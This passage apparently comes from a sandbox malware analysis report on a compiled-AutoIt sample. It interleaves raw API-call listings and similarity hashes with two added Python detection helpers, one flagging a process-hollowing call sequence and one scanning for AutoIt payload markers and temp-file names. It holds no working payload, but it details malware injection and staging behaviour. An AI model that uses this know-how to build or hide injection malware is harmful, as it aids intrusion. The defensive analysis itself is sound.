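# Api.MODULE(args), ref: ADDR  (args and the parentheses may be absent).
_API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\),?)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int  # call-site address printed after 'ref:'


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one API line of the report; None if the line is not an API line."""
    m = _API_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16))


def _hex(arg: str) -> Optional[int]:
    """Decode a printed argument; '?' and string arguments give None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_context_flags(value: int) -> List[str]:
    """Name the x86 CONTEXT flag bits set in value (0x10007 -> CONTEXT_FULL)."""
    names = ["CONTEXT_i386"] if value & CONTEXT_I386 else []
    names += [name for bit, name in sorted(_CONTEXT_BITS.items()) if value & bit]
    return names


# Ordered stages of the preamble; each stage accepts any API in its set.
_HOLLOW_STAGES = (
    {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    {"Wow64GetThreadContext", "GetThreadContext"},
    {"ReadProcessMemory"},
)


def hollowing_preamble(calls: List[ApiCall], backed_by_pe: bool) -> dict:
    """Match the ordered stages against the call list and report what was seen."""
    hits: List[ApiCall] = []
    for call in calls:
        if len(hits) < len(_HOLLOW_STAGES) and call.api in _HOLLOW_STAGES[len(hits)]:
            hits.append(call)
    found = len(hits) == len(_HOLLOW_STAGES)
    result = {
        "sequence": found,
        "unbacked_region": not backed_by_pe,
        "context_flags": [],
        "reads_pointer_size": False,
        "suspicious": found and not backed_by_pe,
    }
    if found:
        ctx_call, rpm_call = hits[1], hits[2]
        # The report prints the ContextFlags value in the context argument slot.
        for arg in ctx_call.args:
            v = _hex(arg)
            if v is not None and v & CONTEXT_I386:
                result["context_flags"] = decode_context_flags(v)
        # ReadProcessMemory(hProcess, lpBase, lpBuffer, nSize, lpRead): nSize is args[3].
        # A 4-byte read right after fetching the context is the 32-bit image-base
        # lookup that precedes unmapping and rewriting the target image.
        if len(rpm_call.args) >= 4:
            result["reads_pointer_size"] = _hex(rpm_call.args[3]) == 4
    return result


# Constructed input: the three lines of the 034D0000 record, in the report's format.
SAMPLE_LINES = [
    "• CreateProcessW.KERNELBASE(?,00000000), ref: 034D1A5B",
    "• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 034D1AF1",
    "• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 034D1B13",
]


def triage_record(lines: List[str], backed_by_pe: bool) -> dict:
    calls = [c for c in (parse_api_line(l) for l in lines) if c is not None]
    return hollowing_preamble(calls, backed_by_pe)


if __name__ == "__main__":
    print(triage_record(SAMPLE_LINES, backed_by_pe=False))
```

Run over the record's three lines with `backed_by_pe=False`, the helper reports the full sequence, a CONTEXT_FULL context read and a pointer-sized ReadProcessMemory; the later write, SetThreadContext and resume steps that the signatures in the report summary imply are not in this record, so the rule deliberately stops at the preamble.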
                                                            APIs
                                                              • Part of subcall function 001A5045: _fseek.LIBCMT ref: 001A505D
                                                              • Part of subcall function 002099BE: _wcscmp.LIBCMT ref: 00209AAE
                                                              • Part of subcall function 002099BE: _wcscmp.LIBCMT ref: 00209AC1
                                                            • _free.LIBCMT ref: 0020992C
                                                            • _free.LIBCMT ref: 00209933
                                                            • _free.LIBCMT ref: 0020999E
                                                              • Part of subcall function 001C2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,001C9C64), ref: 001C2FA9
                                                              • Part of subcall function 001C2F95: GetLastError.KERNEL32(00000000,?,001C9C64), ref: 001C2FBB
                                                            • _free.LIBCMT ref: 002099A6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                            • Instruction ID: a79f310efffdb40e638235f75a652abfcd8b6cb41699078a029ad5a9c4de35c9
                                                            • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                            • Instruction Fuzzy Hash: 535160B1904358AFDF249F64CC41A9EBB7AEF58300F1004AEF649A7282DB715E90CF58
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                            • Instruction ID: 845fb2f6e83377286269880360ec613fe114172aebc3060051ea09bb81afe66f
                                                            • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                            • Instruction Fuzzy Hash: 1641D370A486169BDF28CEA9C8A0FAF77A6EFB4364B24813DE856C7640D770DD408B44
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: AU3!P/#$EA06
                                                            • API String ID: 4104443479-3681569584
                                                            • Opcode ID: 2cfa23ebb6f979b3d3135a006af47a423a889faee9d824301130f4cc0dbea933
                                                            • Instruction ID: fec40e6560df0d47e44126a5cf5cea2759e1f9849d6cda994db5be82420d5446
                                                            • Opcode Fuzzy Hash: 2cfa23ebb6f979b3d3135a006af47a423a889faee9d824301130f4cc0dbea933
                                                            • Instruction Fuzzy Hash: CC418D79A04154ABDF269F648C517BE7FA6AFD7300F294065F8829B283C7F98D4083E1
                                                            APIs
                                                            • _memset.LIBCMT ref: 001DEE62
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 001DEEAC
                                                              • Part of subcall function 001A48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001A48A1,?,?,001A37C0,?), ref: 001A48CE
                                                              • Part of subcall function 001C09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001C09F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: a82b9bd9bc3c019851b52b9bad519ef3b6dfe8dbeae4fc21796351c9ef5821cb
                                                            • Instruction ID: 61c5d3b7d6a01be6431378e5a907e5709ae3b47c2643fe3c019d1582a3ffe816
                                                            • Opcode Fuzzy Hash: a82b9bd9bc3c019851b52b9bad519ef3b6dfe8dbeae4fc21796351c9ef5821cb
                                                            • Instruction Fuzzy Hash: DD21C6319102589BCB11DF94DC45BEE7BFC9F59315F00401AE808E7281DBB85A8D8FA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: d2472b79a9b2bca1be7e1386100545cb4c4c312b930d2698c0316a764d43cfbe
                                                            • Instruction ID: 8dad1b43df4a0cc6d9843cf2d58abd77ef4eba80185066ceb51cd57f462534b6
                                                            • Opcode Fuzzy Hash: d2472b79a9b2bca1be7e1386100545cb4c4c312b930d2698c0316a764d43cfbe
                                                            • Instruction Fuzzy Hash: 2D01F9718142187EDB28CAA8C816FEE7BF89B11301F00419EF552D2182E5B5E6188760
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00209B82
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00209B99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: 3b9d6268fda33e2d76aa48f8fc378eac53aa2647c0a39c0727b8211ce94948cb
                                                            • Instruction ID: f7708ccce0dd17a0d87569e10091cd16e030900f5b42dc76d768ab422a8a78c3
                                                            • Opcode Fuzzy Hash: 3b9d6268fda33e2d76aa48f8fc378eac53aa2647c0a39c0727b8211ce94948cb
                                                            • Instruction Fuzzy Hash: F8D05E7954030DBBDB609BD0EC0EF9A773CE705701F0053B1BF54911A1DEB055A98BA5
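Three records in this listing carry the AutoIt runtime's own fingerprints: the "AU3!" and "EA06" string IDs on the _memmove and __fread_nolock functions (the compiled-script header the loader checks), the ">>>AUTOIT SCRIPT<<<" marker seen earlier, and the GetTempFileNameW call with the "aut" prefix that produces the temp files the extracted script is staged in. The Python below is an added example, not code from the report or from the sample, that turns those three observations into a scan a practitioner can run over a dumped buffer and a file name. Assumptions made here: the version tag is four printable ASCII characters following "AU3!" (the report shows EA06), the resource marker may be stored as ASCII or UTF-16LE, and GetTempFileNameW with uUnique == 0 yields "aut" followed by one to four hex digits and ".tmp"; the sample buffer is constructed.

```python
"""Marker scan for compiled-AutoIt payloads and their temp files.

Added example, not code from the report or the sample. Finds the 'AU3!<tag>'
header and the '>>>AUTOIT SCRIPT<<<' resource marker the report's string IDs
show, and recognises GetTempFileNameW(path, "aut", 0, buf) output names.
"""
import re
from typing import List, Tuple

# Assumed: a four-character version tag (EA06 in this sample) follows 'AU3!'.
AU3_TAG_RE = re.compile(rb"AU3!([A-Z0-9]{4})")
SCRIPT_MARKER = ">>>AUTOIT SCRIPT<<<"
# GetTempFileNameW("aut", uUnique=0) -> aut<uuuu>.tmp, uuuu a hex number (assumed 1-4 digits).
TEMP_NAME_RE = re.compile(r"^aut[0-9A-F]{1,4}\.tmp$", re.IGNORECASE)


def find_au3_headers(buf: bytes) -> List[Tuple[int, str]]:
    """(offset, version tag) for each 'AU3!xxxx' occurrence, e.g. (86, 'EA06')."""
    return [(m.start(), m.group(1).decode("ascii")) for m in AU3_TAG_RE.finditer(buf)]


def find_script_markers(buf: bytes) -> List[Tuple[int, str]]:
    """(offset, encoding) for the resource marker in ASCII or UTF-16LE form."""
    hits = []
    for enc in ("ascii", "utf-16-le"):
        needle = SCRIPT_MARKER.encode(enc)
        pos = buf.find(needle)
        while pos != -1:
            hits.append((pos, enc))
            pos = buf.find(needle, pos + 1)
    return hits


def is_autoit_temp_name(name: str) -> bool:
    """True for names such as 'aut1A2B.tmp' that the 'aut' prefix produces."""
    return TEMP_NAME_RE.match(name) is not None


def triage(buf: bytes) -> dict:
    """Collect both marker types and a single verdict for a memory or file dump."""
    headers = find_au3_headers(buf)
    markers = find_script_markers(buf)
    return {
        "au3_headers": headers,
        "script_markers": markers,
        "likely_autoit": bool(headers) or bool(markers),
    }


# Constructed buffer: padding, the UTF-16LE resource marker, padding, the
# 'AU3!EA06' header followed by a few dummy body bytes.
SAMPLE = (
    b"\x00" * 32
    + SCRIPT_MARKER.encode("utf-16-le")
    + b"\x00" * 16
    + b"AU3!EA06"
    + b"\x01\x02\x03\x04"
)

if __name__ == "__main__":
    print(triage(SAMPLE))
    print(is_autoit_temp_name("aut1A2B.tmp"), is_autoit_temp_name("autorun.tmp"))
```

Both marker checks are plain byte searches, so they work on the process-memory dumps the report links as well as on the file on disk; the temp-name check is what you would apply to file-creation telemetry from %TEMP% while the sample runs.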
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4efa4c2eac2fa30e0a44ec134d93499983ab3db22b2ac8915def0a38c7438df5
                                                            • Instruction ID: 4e86740cee7ff3b800bccf26ef26438c82bea6c3fadde987e0f2cca76fbe7631
                                                            • Opcode Fuzzy Hash: 4efa4c2eac2fa30e0a44ec134d93499983ab3db22b2ac8915def0a38c7438df5
                                                            • Instruction Fuzzy Hash: 4CF15774A18301DFC714DF28C480A6ABBE5FF99314F14892EF8999B252D771E985CF82
                                                            APIs
                                                            • _memset.LIBCMT ref: 001A4401
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 001A44A6
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001A44C3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$_memset
                                                            • String ID:
                                                            • API String ID: 1505330794-0
                                                            • Opcode ID: 5a60b838ff5747261cc34af744c8ef950fa35dc3c12bb5d13d23761c97cf090e
                                                            • Instruction ID: 298ad95f575855ff6219299b7581ea3e7983de35896c263d0ce0dfec23bc96d3
                                                            • Opcode Fuzzy Hash: 5a60b838ff5747261cc34af744c8ef950fa35dc3c12bb5d13d23761c97cf090e
                                                            • Instruction Fuzzy Hash: C2318EB45043019FD761DF24E88879BBBF8FB89304F00092EE99A83241D7B1A948CB92
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 001C5963
                                                              • Part of subcall function 001CA3AB: __NMSG_WRITE.LIBCMT ref: 001CA3D2
                                                              • Part of subcall function 001CA3AB: __NMSG_WRITE.LIBCMT ref: 001CA3DC
                                                            • __NMSG_WRITE.LIBCMT ref: 001C596A
                                                              • Part of subcall function 001CA408: GetModuleFileNameW.KERNEL32(00000000,002643BA,00000104,?,00000001,00000000), ref: 001CA49A
                                                              • Part of subcall function 001CA408: ___crtMessageBoxW.LIBCMT ref: 001CA548
                                                              • Part of subcall function 001C32DF: ___crtCorExitProcess.LIBCMT ref: 001C32E5
                                                              • Part of subcall function 001C32DF: ExitProcess.KERNEL32 ref: 001C32EE
                                                              • Part of subcall function 001C8D68: __getptd_noexit.LIBCMT ref: 001C8D68
                                                            • RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,00000000,?,?,?,001C1013,?), ref: 001C598F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 87ec27929b2b26ac4570d4c80ec8344b6b237cb687b1a32ac3bef1f4586901cc
                                                            • Instruction ID: 130b510229da5a63387b78943caee6b6b1888beb65f5546a2a0331bc6402a078
                                                            • Opcode Fuzzy Hash: 87ec27929b2b26ac4570d4c80ec8344b6b237cb687b1a32ac3bef1f4586901cc
                                                            • Instruction Fuzzy Hash: EB01D231240A15DEE7253B64E856F6E725A9F72B38F51406EF4019A1C1DFB0FD818761
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,002097D2,?,?,?,?,?,00000004), ref: 00209B45
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,002097D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00209B5B
                                                            • CloseHandle.KERNEL32(00000000,?,002097D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00209B62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: b0ff642eaad6af98147d69d535c3a51b2c234af27719adef3fd51138b3ca87c8
                                                            • Instruction ID: bfbef0d12a85dc3451464a96c73824ce9ec8a5e24a760cc2ceabe1784ffa8be4
                                                            • Opcode Fuzzy Hash: b0ff642eaad6af98147d69d535c3a51b2c234af27719adef3fd51138b3ca87c8
                                                            • Instruction Fuzzy Hash: 0DE08632180314B7D7311F94FD0EFCA7B28AB05775F104230FB15690E087B125229798
                                                            APIs
                                                            • _free.LIBCMT ref: 00208FA5
                                                              • Part of subcall function 001C2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,001C9C64), ref: 001C2FA9
                                                              • Part of subcall function 001C2F95: GetLastError.KERNEL32(00000000,?,001C9C64), ref: 001C2FBB
                                                            • _free.LIBCMT ref: 00208FB6
                                                            • _free.LIBCMT ref: 00208FC8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                            • Instruction ID: 5f6e761f403137fa00002db2ee3435f845bab1efdd5a5c4eabab276c8acc52b2
                                                            • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                            • Instruction Fuzzy Hash: D8E0C2A13087034BCB20B938AD04F8317FE0F58320708080DF449DB183CF30E8508024
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CALL
                                                            • API String ID: 0-4196123274
                                                            • Opcode ID: 7dca40872e3ac5a5696356ba4309695108876ca7f9f42eb2d0549a6a72e40054
                                                            • Instruction ID: 483b7c8cde057c3a62789e71a81819b51b3bcaad81112e06d61062b924c53552
                                                            • Opcode Fuzzy Hash: 7dca40872e3ac5a5696356ba4309695108876ca7f9f42eb2d0549a6a72e40054
                                                            • Instruction Fuzzy Hash: DF224778508241DFC729DF14C494B6ABBF1BF9A300F55895DF88A8B262D771ED81CB82
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 001A4992
                                                              • Part of subcall function 001C35AC: __lock.LIBCMT ref: 001C35B2
                                                              • Part of subcall function 001C35AC: DecodePointer.KERNEL32(00000001,?,001A49A7,001F81BC), ref: 001C35BE
                                                              • Part of subcall function 001C35AC: EncodePointer.KERNEL32(?,?,001A49A7,001F81BC), ref: 001C35C9
                                                              • Part of subcall function 001A4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001A4A73
                                                              • Part of subcall function 001A4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001A4A88
                                                              • Part of subcall function 001A3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001A3B7A
                                                              • Part of subcall function 001A3B4C: IsDebuggerPresent.KERNEL32 ref: 001A3B8C
                                                              • Part of subcall function 001A3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,002662F8,002662E0,?,?), ref: 001A3BFD
                                                              • Part of subcall function 001A3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 001A3C81
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001A49D2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                            • String ID:
                                                            • API String ID: 1438897964-0
                                                            • Opcode ID: 4c8d8780040ece540e79e0c6c01c00cb36288db8875ed5d2957a131b528a7e13
                                                            • Instruction ID: 754faa1c85d7b8d16b0e68dfc64b34a5ffd0356f67efd9252677f7216b5fcd72
                                                            • Opcode Fuzzy Hash: 4c8d8780040ece540e79e0c6c01c00cb36288db8875ed5d2957a131b528a7e13
                                                            • Instruction Fuzzy Hash: BD118971908311ABC300EF68EC4990AFFF8EBA9710F00862EF455832B1DBB09655CB92
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,001A5981,?,?,?,?), ref: 001A5E27
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,001A5981,?,?,?,?), ref: 001DE19C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
